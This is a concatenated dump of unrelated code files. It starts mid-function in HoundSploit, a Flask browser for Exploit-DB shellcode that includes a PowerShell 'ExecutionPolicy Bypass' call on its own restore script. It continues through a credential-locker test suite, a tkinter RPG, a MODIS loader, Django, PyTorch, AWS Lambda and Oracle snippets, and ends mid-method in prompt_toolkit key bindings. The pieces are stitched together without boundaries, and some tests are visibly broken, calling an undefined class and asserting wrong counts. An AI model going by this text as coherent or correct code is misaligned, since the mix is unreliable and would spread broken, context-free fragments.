remove_bookmark_shellcode(): """ Remove the bookmark for the selected shellcode. :return: a template showing the details about the selected shellcode and the source code. """ vulnerability_class = "shellcode" shellcode_id = request.args.get('shellcode-id', None) shellcode = get_shellcode_by_id(shellcode_id) if shellcode is None: error_msg = 'Sorry! 
This shellcode does not exist :(' return render_template('error_page.html', error=error_msg) file_path = init_path + "/exploitdb/" + shellcode.file try: with open(file_path, 'r') as f: content = f.readlines() vulnerability_code = ''.join(content) remove_bookmark(shellcode_id, vulnerability_class) return render_template('code_viewer.html', vulnerability_code=vulnerability_code, vulnerability_description=shellcode.description, vulnerability_file=shellcode.file, vulnerability_author=shellcode.author, vulnerability_date=shellcode.date, vulnerability_type=shellcode.type, vulnerability_platform=shellcode.platform, file_path=file_path, shellcode_id=shellcode_id, bookmarked=is_bookmarked(shellcode_id, vulnerability_class)) except FileNotFoundError: error_msg = 'Sorry! This file does not exist :(' return render_template('error_page.html', error=error_msg) @app.route('/fix-dates') def repair_dates(): # print("Starting fix") fix_dates() # print("Ending fix") return render_template('settings.html', latest_db_update=get_latest_db_update_date(), db_update_alert=False, sw_update_alert=False, no_updates_alert=False) @app.route('/restore-exploitdb') def restore_exploitdb(): # print("Starting fix") if platform.system() == "Windows": script_path = os.path.abspath(init_path + "/houndsploit/HoundSploit/scripts/restore_exploitdb.ps1") os.system("powershell.exe -ExecutionPolicy Bypass -File " + script_path) # print("Ending fix") return render_template('error_page.html', error="Please restart the application server for applying changes!") else: fixed_exploitdb_path = os.path.abspath(init_path + "/fixed_exploitdb") db_path = os.path.abspath(init_path + "/hound_db.sqlite3") shutil.rmtree(fixed_exploitdb_path) os.remove(db_path) create_db() # print("Ending fix") return render_template('settings.html', latest_db_update=get_latest_db_update_date(), db_update_alert=False, sw_update_alert=False, no_updates_alert=False) def start_app(): # app.run(debug=True, host='0.0.0.0') app.run(debug=False) import unittest import pyperclip from credentials import Credential class TestCredentials(unittest.TestCase): ''' Test class that defines test cases for the credentials class behaviours. Args: unittest.TestCase: TestCase class that helps in creating test cases ''' def setUp(self): ''' Set up method to run before each test cases. ''' self.new_cred = Credential("gigi","4444","facebook","") def test_init(self): ''' test_init test case to test if the object is initialized properly ''' self.assertEqual(self.new_cred.username,"gigi") self.assertEqual(self.new_cred.password,"") self.assertEqual(self.new_cred.new_account,"facebook") self.assertEqual(self.new_cred.email,"") def test_save(self): ''' test_save_data test case to test if the object is saved into the cred... list ''' self.new_cred.keeped() # saving the new data instagram=Credential('aline','aline','instagram','aline@hhh') instagram.keeped() self.assertEqual(len(Credential.list_cred),1) def tearDown(self): ''' tearDown method that does clean up after each test case has run. 
''' Credential.list_cred= [] def test_save_multiple(self): ''' test_save_multiple_data to check if we can save multiple credentials objects to our cred_list ''' self.new_cred.keeped() test_cred = Credential("ally","3333","wastap","") # new data test_cred.keeped() self.assertEqual(len(Credential.list_cred),2) def test_display(self): ''' display users ''' self.assertEqual(Locker.display(),Locker.locker_list) def test_diplay_cred(self): ''' method to display credentials ''' self.new_cred.keeped() instagram=Credential("aline","aline","instragram","aline") instagram.keeped() self.assertEqual(len(Credential.excute(instagram.username)),1) def test_delete(self): ''' test_delete to test if we can remove a data from our cred list ''' self.new_cred.keeped() test_cred = Credential("ally","3333","wastap","") # new data test_cred.keeped() self.new_cred.remove()# Deleting a data object self.assertEqual(len(Credential.list_cred),1) def test_find(self): ''' test to check if we can find a data by using name and display information ''' self.new_cred.keeped() test_cred = Credential("ally","3333","wastap","") # new contact test_cred.keeped() find_name = Credential.find_username("ally") self.assertEqual(find_name.new_account,test_cred.new_account) def test_exists(self): ''' test to check if we can return a Boolean if we cannot find the our object. ''' self.new_cred.keeped() test_cred = Credential("gigi","4444","facebook","") test_cred.keeped() existing = Credential.cred_exists("gigi") self.assertTrue(existing) def test_display(self): ''' method that returns a list of all objects saved ''' self.new_cred.keeped() instagram=Credential("bebe","3333","twitter","") instagram.keeped() self.assertEqual(len(Credential.excute(instagram.username)),1) def copy_name(self): ''' Test to confirm that we are copying the name address from our data ''' self.new_cred.keeped() Credential.copy_username("gigi") self.assertEqual(self.new_cred.username,pyperclip.paste()) if __name__ == '__main__': unittest.main() # -*- coding: utf-8 -*- import os import networkx as nx from nxpd import draw from socialgraph.socialgraph import subgraph_by_topic, elect_committee, paint_graph MAX_EDGES = 300 TOPIC = 'Groceries' wiki_file = os.path.join('..', 'datasets', 'wiki.graphml') G = nx.read_graphml(wiki_file) print("Full graph: {0} nodes {1} edges".format(len(G.nodes()), len(G.edges()))) # Generate smaller graph and override G subnodes = G.nodes()[:MAX_EDGES] G = G.subgraph(subnodes) print("Subgraph: {0} nodes {1} edges".format(len(G.nodes()), len(G.edges()))) # Filter graph by subtopic G = subgraph_by_topic(G, TOPIC) draw(G) committee = elect_committee(G, 20) print("Committee:") print({k: len(v) for k, v in committee.items()}) draw(paint_graph(G, committee))0 '''Create a game with races and some classes of an ordinary fantasy medieval rpg where: 1. You choose a race, a class and start 1v1 battles against some monsters, gaining points for each monster defeated. Each race and class will have some unique traits and skills. 2. The battle system will use some dices (like a Tabletop RPG) that will influence on the results of the battle. There will be three main options to choose to act: Attack (with at least 2 different attacks by class), Defend (where the dice results are used as shields to reduce the enemy attack), Evade (where if your dice results are greater than the enemy, you nullify the enemy damage else you take the entire damage, and use some item). 3. 
When your character dies you will receive your points acumulated for each enemy defeated.''' from tkinter import * from tkinter import ttk import os from RPG_module.classes import * from RPG_module.functions import * dir = os.path.dirname(__file__) game = Tk() game.title('RPG Horde Game') game.geometry('700x400') screen_fr = Frame(game, borderwidth=1, relief='flat', background='lightblue') screen_fr.place(x=0, y=0, width=1280, height=660) img = PhotoImage(file=dir+r'\Images\rpg_screen.gif') lb_img = Label(screen_fr, image=img, borderwidth=0).pack() start_fr = Frame(lb_img, borderwidth=1, relief='raised', background='black', width=400, height=400) start_fr.pack(pady=60, ipady=20) start_title = Label(start_fr, text='RPG Horde Game', font=('Comic Sans MS', 15), foreground='white', background='darkred', width=30) start_title.grid(columnspan=2, row=0, sticky='n') Label(start_fr, text='Character Name', bg='darkred', fg='white', font=('Comic Sans MS', 12)).grid(columnspan=2, row=1, pady=20) c_name = Entry(start_fr, width=23) c_name.grid(columnspan=2, row=2) Label(start_fr, text='Race', font=('Comic Sans MS', 12), background='darkred', foreground='white').grid(columnspan=2, row=3, pady=20) races = ['Human', 'Elf', 'Dwarf', 'Half Orc'] start_race = ttk.Combobox(start_fr, values=races) start_race.set(races[0]) start_race.grid(columnspan=2, row=4) Label(start_fr, text='Class', font=('Comic Sans MS', 12), background='darkred', foreground='white').grid(columnspan=2, row=5, pady=20) classes = ['Knight', 'Mage', 'Archer', 'Swordsman', 'Barbarian', 'Rogue'] start_class = ttk.Combobox(start_fr, values=classes) start_class.set(classes[0]) start_class.grid(columnspan=2, row=6) Label(start_fr, text='Battle Scene', font=('Comic Sans MS', 12), bg='darkred', fg='white').grid(columnspan=2, row=7, pady=20) scenes = ['Scene 1', 'Scene 2', 'Scene 3'] scene = ttk.Combobox(start_fr, values=scenes) scene.set(value=scenes[0]) scene.grid(columnspan=2, row=8) btn_play = Button(start_fr, text='Play Game', font=('Comic Sans MS', 12), background='darkred', foreground='white', command=play) btn_play.grid(column=0, row=9, pady=25, sticky='e', padx=15) btn_exit = Button(start_fr, text='Exit Game', font=('Comic Sans MS', 12), background='darkred', foreground='white', command=game.quit) btn_exit.grid(column=1, row=9, pady=25, sticky='w', padx=15) game.mainloop() from kws import * # ~/anaconda3/envs/envGeoDB/bin/python import os import numpy as np from osgeo import gdal import psycopg2 import subprocess from datetime import datetime as dt import time dbName = 'gisdb' schName = 'modis' varName = 'fpar' tRg = [dt(2011, 1, 1), dt(2011, 3, 1)] # hTileRg = [7, 12] # vTileRg = [4, 6] hTileRg = [8, 9] vTileRg = [4, 5] modisDir = '/mnt/sdb/rawData/MCD15A2H.006/' fileLst = list() dateStrLst = [x for x in os.listdir(modisDir) if dt.strptime(x, '%Y.%m.%d') >= tRg[0] and dt.strptime(x, '%Y.%m.%d') <= tRg[1]] for dateStr in dateStrLst: modisFolder = os.path.join(modisDir, dateStr) for fileName in os.listdir(modisFolder): if fileName.endswith('.hdf'): tileStr = fileName.split('.')[2] hTile = int(tileStr[1:3]) vTile = int(tileStr[4:6]) if hTile >= hTileRg[0] and hTile <= hTileRg[1] \ and vTile >= vTileRg[0] and vTile <= vTileRg[1]: fileLst.append(os.path.join(modisDir, dateStr, fileName)) conn = psycopg2.connect(database='gisdb', user='postgres', host="localhost", password='', port=5432) cursor = conn.cursor() bTable = False try: cursor = conn.cursor() cursor.execute( r"SELECT EXISTS(SELECT fpar FROM modis)") bTable = True except psycopg2.Error 
as errStr: print(errStr) t1 = time.time() for f in fileLst: if bTable is False: cmdOpt = '-s 96431 -F -I -R -C -c' else: cmdOpt = '-s 96431 -F -I -R -C -a' cmdFile = 'HDF4_EOS:EOS_GRID:'+f+':MOD_Grid_MOD15A2H:Fpar_500m' cmdTab = 'modis.fpar' cmdOut = '| psql -d gisdb' cmd = ' '.join(['raster2pgsql', cmdOpt, cmdFile, cmdTab, cmdOut]) subprocess.call(cmd, shell=True) if bTable is False: # cursor = conn.cursor() # cursor.execute( # r"SELECT DropRasterConstraints('modis','fpar', 'rast','enforce_same_alignment_rast')") bTable = True print('load MODIS: ', time.time()-t1) from django.urls import path from django.http import HttpResponse urlpatterns = [ path("overridden_url/", lambda r: HttpResponse("Overridden urlconf works!")) ] SACGF/variantgrid from django.conf import settings from django.core.management.base import BaseCommand from snpdb.models import VCF, log_traceback, SomalierVCFExtract, GenomeBuild, SomalierRelatePairs from snpdb.tasks.somalier_tasks import somalier_vcf_id, somalier_all_samples class Command(BaseCommand): def add_arguments(self, parser): parser.add_argument("--genome-build") parser.add_argument('--clear', action='store_true') def handle(self, *args, **options): if options.get("clear"): SomalierVCFExtract.objects.all().delete() SomalierRelatePairs.objects.all().delete() vcf_kwargs = {} if build_name := options.get("genome_build"): vcf_kwargs["genome_build"] = GenomeBuild.get_name_or_alias(build_name) if not settings.SOMALIER.get("enabled"): raise ValueError("settings.SOMALIER['enabled'] not enabled!") for vcf in VCF.objects.filter(somaliervcfextract__isnull=True, **vcf_kwargs): try: somalier_vcf_id(vcf.pk) except: log_traceback() somalier_all_samples() neuromake/menu/__init__.py from .menu import Menu from .samples import * import torch.nn as nn def lstm(input_size, hidden_size, **kwargs): m = nn.LSTM(input_size, hidden_size, **kwargs) for name, param in m.named_parameters(): if 'weight' in name or 'bias' in name: param.data.uniform_(-0.1, 0.1) return m def lstm_cell(input_size, hidden_size, **kwargs): m = nn.LSTMCell(input_size, hidden_size, **kwargs) for name, param in m.named_parameters(): if 'weight' in name or 'bias' in name: param.data.uniform_(-0.1, 0.1) return m def linear(in_features, out_features, bias=True, dropout=0.): """Linear layer (input: N x T x C)""" m = nn.Linear(in_features, out_features, bias=bias) m.weight.data.uniform_(-0.1, 0.1) if bias: m.bias.data.uniform_(-0.1, 0.1) return m def embedding(num_embeddings, embedding_dim, padding_idx): m = nn.Embedding(num_embeddings, embedding_dim, padding_idx=padding_idx) nn.init.uniform_(m.weight, -0.1, 0.1) nn.init.constant_(m.weight[padding_idx], 0) return m1-10 import os import datetime import json from base64 import b64decode import boto3 from botocore.vendored import requests def handler(event, context): """ Invokes the main function for each report module """ with open('config.json') as f: config = json.load(f) reports = config['reports'] function = os.environ.get('FUNCTION', None) env = os.environ.get('ENV', None) day = datetime.datetime.now().strftime('%Y%m%d') bucket = 'kf-reports-us-east-1-{}-quality-reports'.format(env) output = '{}/{}-reports'.format(bucket, day) lam = boto3.client('lambda') for report in reports: report_output = '{}/{}'.format(output, report['name'].replace(' ', '_')) report['output'] = report_output response = lam.invoke( FunctionName=function, InvocationType='Event', Payload=str.encode(json.dumps(report)), ) print('invoked report {}'.format(report['name'])) print('output to 
{}'.format(report['output'])) # Send slack message if 'SLACK_SECRET' in os.environ and 'SLACK_CHANNEL' in os.environ: kms = boto3.client('kms', region_name='us-east-1') SLACK_SECRET = os.environ.get('SLACK_SECRET', None) SLACK_TOKEN = kms.decrypt(CiphertextBlob=b64decode(SLACK_SECRET)).get('Plaintext', None).decode('utf-8') SLACK_CHANNEL = os.environ.get('SLACK_CHANNEL', '').split(',') SLACK_CHANNEL = [c.replace('#','').replace('@','') for c in SLACK_CHANNEL] TRACKER_URL = os.environ.get('REPORT_TRACKER', '') for channel in SLACK_CHANNEL: bucket = output.split('/')[0] path = '/'.join(output.split('/')[1:]) report_url = f"https://s3.amazonaws.com/{bucket}/index.html#{path}/" attachments = [{ "text": "{} tasty reports ready for viewing".format(len(reports)), "fallback": "{} tasty reports ready for viewing".format(len(reports)), "callback_id": "view_report", "color": "#3AA3E3", "attachment_type": "default", "actions": [ { "name": "overview", "text": "View Now", "type": "button", "url": f'{TRACKER_URL}?url='+report_url, "style": "primary" } ] }] message = { 'username': 'Report Bot', 'icon_emoji': ':bar_chart:', 'channel': channel, 'attachments': attachments, 'text': 'New reports are in hot and fresh :pie:' } resp = requests.post('https://slack.com/api/chat.postMessage', headers={'Authorization': 'Bearer '+SLACK_TOKEN}, json=message) binding.gyp { "targets": [ { "target_name": "crc", "sources": [ "./src/crc_module.c", "./src/crc.c" ] }, ] }# Generated by Django 2.1.2 on 2018-12-05 20:25 import django.contrib.postgres.fields.jsonb from django.db import migrations, models class Migration(migrations.Migration): initial = True dependencies = [] operations = [ migrations.CreateModel( name="DiscordGuild", fields=[ ("id", models.BigIntegerField(primary_key=True, serialize=False)), ( "data", django.contrib.postgres.fields.jsonb.JSONField( blank=True, null=True ), ), ("cached_date", models.DateTimeField(auto_now_add=True)), ], options={ "verbose_name": "Discord Guild", "verbose_name_plural": "Discord Guilds", }, ), ] sergelevin/pyofdtest/test_providers.py # -*- coding: utf-8 -*- import unittest import pyofd from datetime import datetime receipts_data = { 'Taxcom': { 'fpd': 1027455652, 'total': 1487, 'rn_kkt': 1482558031668, 'fd': 9960, 'inn': 7814148471, 'purchase_date': datetime(year=2018, month=1, day=7, hour=14, minute=51) }, 'Platforma': { 'fpd': 504931317, 'total': '822.91', 'fn': 8710000100186516, 'rn_kkt': '0000051440037872', 'fd': 136682, 'inn': 5036045205, 'purchase_date': datetime(year=2018, month=1, day=10, hour=17, minute=37) }, '1-OFD': { 'fpd': 2819037689, 'total': '1948.28', 'fn': 8710000100828376, 'fd': 87242, 'inn': 7840016802, 'purchase_date': datetime(year=2017, month=9, day=30, hour=16, minute=7) }, 'Yarus': { 'fpd': 4023651155, 'total': '526.00', 'rn_kkt': 691164058512, 'fd': 34113, 'inn': 7705814643, 'purchase_date': datetime(year=2018, month=1, day=13, hour=20, minute=44) }, 'OfdRu': { 'fpd': 2981623349, 'total': 330, 'rn_kkt': 489397013091, 'fd': 7481, 'inn': 7814339162, 'fn': 8710000100617432, 'purchase_date': datetime(year=2018, month=1, day=16, hour=13, minute=11) }, 'Yandex': { 'fpd': 3826178549, 'total': '390', 'rn_kkt': 840594031594, 'fd': 238872, 'inn': 7704340310, 'purchase_date': datetime(year=2018, month=3, day=7, hour=10, minute=57) }, 'Kontur': { 'fpd': 1753141947, 'total': 838, 'rn_kkt': 1573495028400, 'fd': 3250, 'inn': 7736567560, 'fn': 8710000101500109, 'purchase_date': datetime(year=2018, month=5, day=6, hour=19, minute=44) } } class 
ProvidersTest(unittest.TestCase): def _test_single_provider(self, provider): self.assertIn(provider, receipts_data) kwargs = receipts_data[provider] receipt = pyofd.OFDReceipt(**kwargs) result = receipt.load_receipt() self.assertIsNotNone(result) self.assertIsNotNone(receipt.provider) self.assertEqual(provider, receipt.provider.providerName) def test_taxcom(self): self._test_single_provider('Taxcom') def test_platforma(self): self._test_single_provider('Platforma') def test_first_ofd(self): self._test_single_provider('1-OFD') def test_yarus(self): self._test_single_provider('Yarus') def test_ofd_ru(self): self._test_single_provider('OfdRu') def test_yandex(self): self._test_single_provider('Yandex') def test_kontur(self): self._test_single_provider('Kontur') 0 import cx_Oracle import pandas as pd import datetime as dt from typing import List, Tuple, TypedDict from src.appLogger import getAppLogger class VoltStatsFetcher(): """repo class to fetch derived voltage from mis_warehouse db. """ def __init__(self, con_string): """constructor method Args: con_string ([type]): connection string """ self.connString = con_string self.voltTable1 = [] self.voltTable2 = [] self.voltTable3 = [] self.voltTable4 = [] self.derivedVoltageDict = {'table1': self.voltTable1, 'table2': self.voltTable2, 'table3': self.voltTable3, 'table4': self.voltTable4} self.appLogger = getAppLogger() def appendTables(self, df: pd.core.frame.DataFrame) -> None: """ append rows for each table for each day voltTable1 =[] voltTable2 =[] voltTable3 =[] voltTable4 =[] Args: df (pd.core.frame.DataFrame): pandas dataframe that contains derived voltage data for each day for all nodes. """ date = df['DATE_KEY'][0].day dfTable1 = df.iloc[0:9] dfTable2 = df.iloc[9:18] dfTable2.reset_index(drop=True, inplace=True) dfTable3 = df.iloc[18:27] dfTable3.reset_index(drop=True, inplace=True) dfTable4 = df.iloc[27:] dfTable4.reset_index(drop=True, inplace=True) tempDictTable1 = {'date': date, 'amreliMax': dfTable1['MAXIMUM'][0], 'amreliMin': dfTable1['MINIMUM'][0], 'asojMax': dfTable1['MAXIMUM'][1], 'asojMin': dfTable1['MINIMUM'][1], 'bhilaiMax': dfTable1['MAXIMUM'][2], 'bhilaiMin': dfTable1['MINIMUM'][2], 'bhopalMax': dfTable1['MAXIMUM'][3], 'bhopalMin': dfTable1['MINIMUM'][3], 'boisarMax': dfTable1[ 'MAXIMUM'][4], 'boisarMin': dfTable1['MINIMUM'][4], 'damohMax': dfTable1['MAXIMUM'][5], 'damohMin': dfTable1['MINIMUM'][5], 'dehgamMax': dfTable1['MAXIMUM'][6], 'dehgamMin': dfTable1['MINIMUM'][6], 'dhuleMax': dfTable1['MAXIMUM'][7], 'dhuleMin': dfTable1['MINIMUM'][7], 'gwaliorMax': dfTable1['MAXIMUM'][8], 'gwaliorMin': dfTable1['MINIMUM'][8]} self.voltTable1.append(tempDictTable1) tempDictTable2 = {'date': date, 'indoreMax': dfTable2['MAXIMUM'][0], 'indoreMin': dfTable2['MINIMUM'][0], 'itarsiMax': dfTable2['MAXIMUM'][1], 'itarsiMin': dfTable2['MINIMUM'][1], 'jetpurMax': dfTable2['MAXIMUM'][2], 'jetpurMin': dfTable2['MINIMUM'][2], 'kalwaMax': dfTable2['MAXIMUM'][3], 'kalwaMin': dfTable2['MINIMUM'][3], 'karadMax': dfTable2[ 'MAXIMUM'][4], 'karadMin': dfTable2['MINIMUM'][4], 'kasorMax': dfTable2['MAXIMUM'][5], 'kasorMin': dfTable2['MINIMUM'][5], 'khandwaMax': dfTable2['MAXIMUM'][6], 'khandwaMin': dfTable2['MINIMUM'][6], 'nagdaMax': dfTable2['MAXIMUM'][7], 'nagdaMin': dfTable2['MINIMUM'][7], 'parliMax': dfTable2['MAXIMUM'][8], 'parliMin': dfTable2['MINIMUM'][8]} self.voltTable2.append(tempDictTable2) tempDictTable3 = {'date': date, 'raigarhMax': dfTable3['MAXIMUM'][0], 'raigarhMin': dfTable3['MINIMUM'][0], 'raipurMax': dfTable3['MAXIMUM'][1], 
'raipurMin': dfTable3['MINIMUM'][1], 'vapiMax': dfTable3['MAXIMUM'][2], 'vapiMin': dfTable3['MINIMUM'][2], 'wardhaMax': dfTable3['MAXIMUM'][3], 'wardhaMin': dfTable3['MINIMUM'][3], 'binaMax': dfTable3[ 'MAXIMUM'][4], 'binaMin': dfTable3['MINIMUM'][4], 'durgMax': dfTable3['MAXIMUM'][5], 'durgMin': dfTable3['MINIMUM'][5], 'gwaliorMax': dfTable3['MAXIMUM'][6], 'gwaliorMin': dfTable3['MINIMUM'][6], 'indoreMax': dfTable3['MAXIMUM'][7], 'indoreMin': dfTable3['MINIMUM'][7], 'kotraMax': dfTable3['MAXIMUM'][8], 'kotraMin': dfTable3['MINIMUM'][8]} self.voltTable3.append(tempDictTable3) tempDictTable4 = {'date': date, 'sasanMax': dfTable4['MAXIMUM'][0], 'sasanMin': dfTable4['MINIMUM'][0], 'satnaMax': dfTable4['MAXIMUM'][1], 'satnaMin': dfTable4['MINIMUM'][1], 'seoniMax': dfTable4['MAXIMUM'][2], 'seoniMin': dfTable4['MINIMUM'][2], 'sipatMax': dfTable4['MAXIMUM'] [3], 'sipatMin': dfTable4['MINIMUM'][3], 'tamnarMax': dfTable4['MAXIMUM'][4], 'tamnarMin': dfTable4['MINIMUM'][4], 'vadodaraMax': dfTable4['MAXIMUM'][5], 'vadodaraMin': dfTable4['MINIMUM'][5], 'wardhaMax': dfTable4['MAXIMUM'][6], 'wardhaMin': dfTable4['MINIMUM'][6]} self.voltTable4.append(tempDictTable4) def fetchDerivedVoltage(self, startDate: dt.datetime, endDate: dt.datetime): """fetch derived voltage from mis_warehouse db Args: startDate (dt.datetime): start date endDate (dt.datetime): end date Returns: derivedVoltageDict ={'table1':voltTable1, 'table2':voltTable2, 'table3':voltTable3, 'table4':voltTable4 } """ startDateLogString = dt.datetime.strftime(startDate, '%Y-%m-%d') endDateLogString = dt.datetime.strftime(endDate, '%Y-%m-%d') logExtra = {"startDate": startDateLogString, "endDate": endDateLogString} # generating dates between startDate and endDate dates = [] delta = endDate - startDate for i in range(delta.days + 1): dates.append(startDate + dt.timedelta(days=i)) try: connection = cx_Oracle.connect(self.connString) except Exception as err: # print('error while creating a connection', err) self.appLogger.error( 'error creating db connection for stationwise voltage stats', exc_info=err, extra=logExtra) else: print(connection.version) try: cur = connection.cursor() # fetching derived voltage data for each day. for date in dates: fetch_sql = '''select vt.date_key, vt.node_name,mt.node_voltage, vt.maximum, vt.minimum from derived_voltage vt, voltage_mapping_table mt where vt.mapping_id = mt.id and mt.is_included_in_daily_voltage = 'T' and date_key = to_date(:start_date) ''' cur.execute( "ALTER SESSION SET NLS_DATE_FORMAT = 'YYYY-MM-DD ' ") df = pd.read_sql(fetch_sql, params={ 'start_date': date}, con=connection) # sorting node_name alphabetically. df.sort_values(['NODE_VOLTAGE', 'NODE_NAME'], ascending=[ True, True], inplace=True, ignore_index=True) # passing object to appendTables method. df['MAXIMUM'] = df['MAXIMUM'].round().astype(int) df['MINIMUM'] = df['MINIMUM'].round().astype(int) self.appendTables(df) except Exception as err: # print('error while creating a cursor', err) self.appLogger.error( 'error while stationwise voltage stats sql db fetch', exc_info=err, extra=logExtra) else: print('retrieval of derived voltage stats data complete') connection.commit() finally: cur.close() connection.close() print("connection closed") return self.derivedVoltageDict lubitelpospat/CFM-source """ Key bindings registry. A `KeyBindings` object is a container that holds a list of key bindings. It has a very efficient internal data structure for checking which key bindings apply for a pressed key. 
Typical usage:: kb = KeyBindings() @kb.add(Keys.ControlX, Keys.ControlC, filter=INSERT) def handler(event): # Handle ControlX-ControlC key sequence. pass It is also possible to combine multiple KeyBindings objects. We do this in the default key bindings. There are some KeyBindings objects that contain the Emacs bindings, while others contain the Vi bindings. They are merged together using `merge_key_bindings`. We also have a `ConditionalKeyBindings` object that can enable/disable a group of key bindings at once. It is also possible to add a filter to a function, before a key binding has been assigned, through the `key_binding` decorator.:: # First define a key handler with the `filter`. @key_binding(filter=condition) def my_key_binding(event): ... # Later, add it to the key bindings. kb.add(Keys.A, my_key_binding) """ from abc import ABCMeta, abstractmethod, abstractproperty from typing import ( TYPE_CHECKING, Callable, Hashable, List, Optional, Sequence, Tuple, TypeVar, Union, cast, ) from prompt_toolkit.cache import SimpleCache from prompt_toolkit.filters import FilterOrBool, Never, to_filter from prompt_toolkit.keys import KEY_ALIASES, Keys # Avoid circular imports. if TYPE_CHECKING: from .key_processor import KeyPressEvent __all__ = [ "Binding", "KeyBindingsBase", "KeyBindings", "ConditionalKeyBindings", "merge_key_bindings", "DynamicKeyBindings", "GlobalOnlyKeyBindings", ] KeyHandlerCallable = Callable[["KeyPressEvent"], None] class Binding: """ Key binding: (key sequence + handler + filter). (Immutable binding class.) :param record_in_macro: When True, don't record this key binding when a macro is recorded. """ def __init__( self, keys: Tuple[Union[Keys, str], ...], handler: KeyHandlerCallable, filter: FilterOrBool = True, eager: FilterOrBool = False, is_global: FilterOrBool = False, save_before: Callable[["KeyPressEvent"], bool] = (lambda e: True), record_in_macro: FilterOrBool = True, ) -> None: self.keys = keys self.handler = handler self.filter = to_filter(filter) self.eager = to_filter(eager) self.is_global = to_filter(is_global) self.save_before = save_before self.record_in_macro = to_filter(record_in_macro) def call(self, event: "KeyPressEvent") -> None: self.handler(event) def __repr__(self) -> str: return "%s(keys=%r, handler=%r)" % ( self.__class__.__name__, self.keys, self.handler, ) # Sequence of keys presses. KeysTuple = Tuple[Union[Keys, str], ...] class KeyBindingsBase(metaclass=ABCMeta): """ Interface for a KeyBindings. """ @abstractproperty def _version(self) -> Hashable: """ For cache invalidation. - This should increase every time that something changes. """ return 0 @abstractmethod def get_bindings_for_keys(self, keys: KeysTuple) -> List[Binding]: """ Return a list of key bindings that can handle these keys. (This return also inactive bindings, so the `filter` still has to be called, for checking it.) :param keys: tuple of keys. """ return [] @abstractmethod def get_bindings_starting_with_keys(self, keys: KeysTuple) -> List[Binding]: """ Return a list of key bindings that handle a key sequence starting with `keys`. (It does only return bindings for which the sequences are longer than `keys`. And like `get_bindings_for_keys`, it also includes inactive bindings.) :param keys: tuple of keys. """ return [] @abstractproperty def bindings(self) -> List[Binding]: """ List of `Binding` objects. (These need to be exposed, so that `KeyBindings` objects can be merged together.) """ return [] # `add` and `remove` don't have to be part of this interface. 
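# --- Illustrative usage sketch (not part of the original module) ---
# A minimal, hedged example of the API described in the module docstring above:
# build two registries, gate one behind a Condition, and merge them. It assumes
# prompt_toolkit is installed; the import path mirrors this file
# (prompt_toolkit/key_binding/key_bindings.py), and all handler bodies are
# illustrative placeholders, not behaviour taken from the original source.
from prompt_toolkit.filters import Condition
from prompt_toolkit.key_binding.key_bindings import (
    ConditionalKeyBindings,
    KeyBindings,
    merge_key_bindings,
)

emacs_kb = KeyBindings()

@emacs_kb.add("c-a")
def _(event):
    # Move the cursor to the start of the buffer (illustrative handler).
    event.current_buffer.cursor_position = 0

vi_kb = KeyBindings()

@vi_kb.add("escape")
def _(event):
    # Leave insert mode (illustrative handler).
    pass

@Condition
def vi_mode_enabled() -> bool:
    return False  # flip to True to activate the whole Vi registry at once

# Enable/disable the Vi registry as a group, then merge both into one object.
bindings = merge_key_bindings(
    [emacs_kb, ConditionalKeyBindings(vi_kb, vi_mode_enabled)]
)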
T = TypeVar("T", bound=Union[KeyHandlerCallable, Binding]) class KeyBindings(KeyBindingsBase): """ A container for a set of key bindings. Example usage:: kb = KeyBindings() @kb.add('c-t') def _(event): print('Control-T pressed') @kb.add('c-a', 'c-b') def _(event): print('Control-A pressed, followed by Control-B') @kb.add('c-x', filter=is_searching) def _(event): print('Control-X pressed') # Works only if we are searching. """ def __init__(self) -> None: self._bindings: List[Binding] = [] self._get_bindings_for_keys_cache: SimpleCache[ KeysTuple, List[Binding] ] = SimpleCache(maxsize=10000) self._get_bindings_starting_with_keys_cache: SimpleCache[ KeysTuple, List[Binding] ] = SimpleCache(maxsize=1000) self.__version = 0 # For cache invalidation. def _clear_cache(self) -> None: self.__version += 1 self._get_bindings_for_keys_cache.clear() self._get_bindings_starting_with_keys_cache.clear() @property def bindings(self) -> List[Binding]: return self._bindings @property def _version(self) -> Hashable: return self.__version def add( self, *keys: Union[Keys, str], filter: FilterOrBool = True, eager: FilterOrBool = False, is_global: FilterOrBool = False, save_before: Callable[["KeyPressEvent"], bool] = (lambda e: True), record_in_macro: FilterOrBool = True, ) -> Callable[[T], T]: """ Decorator for adding a key bindings. :param filter: :class:`~prompt_toolkit.filters.Filter` to determine when this key binding is active. :param eager: :class:`~prompt_toolkit.filters.Filter` or `bool`. When True, ignore potential longer matches when this key binding is hit. E.g. when there is an active eager key binding for Ctrl-X, execute the handler immediately and ignore the key binding for Ctrl-X Ctrl-E of which it is a prefix. :param is_global: When this key bindings is added to a `Container` or `Control`, make it a global (always active) binding. :param save_before: Callable that takes an `Event` and returns True if we should save the current buffer, before handling the event. (That's the default.) :param record_in_macro: Record these key bindings when a macro is being recorded. (True by default.) """ assert keys keys = tuple(_parse_key(k) for k in keys) if isinstance(filter, Never): # When a filter is Never, it will always stay disabled, so in that # case don't bother putting it in the key bindings. It will slow # down every key press otherwise. def decorator(func: T) -> T: return func else: def decorator(func: T) -> T: if isinstance(func, Binding): # We're adding an existing Binding object. self.bindings.append( Binding( keys, func.handler, filter=func.filter & to_filter(filter), eager=to_filter(eager) | func.eager, is_global=to_filter(is_global) | func.is_global, save_before=func.save_before, record_in_macro=func.record_in_macro, ) ) else: self.bindings.append( Binding( keys, cast(KeyHandlerCallable, func), filter=filter, eager=eager, is_global=is_global, save_before=save_before, record_in_macro=record_in_macro, ) ) self._clear_cache() return func return decorator def remove(self, *args: Union[Keys, str, KeyHandlerCallable]) -> None: """ Remove a key binding. This expects either a function that was given to `add` method as parameter or a sequence of key bindings. Raises `ValueError` when no bindings was found. Usage:: remove(handler) # Pass handler. remove('c-x', 'c-a') # Or pass the key bindings. """ found = False if callable(args[0]): assert len(args) == 1 function = args[0] # Remove the given function. 
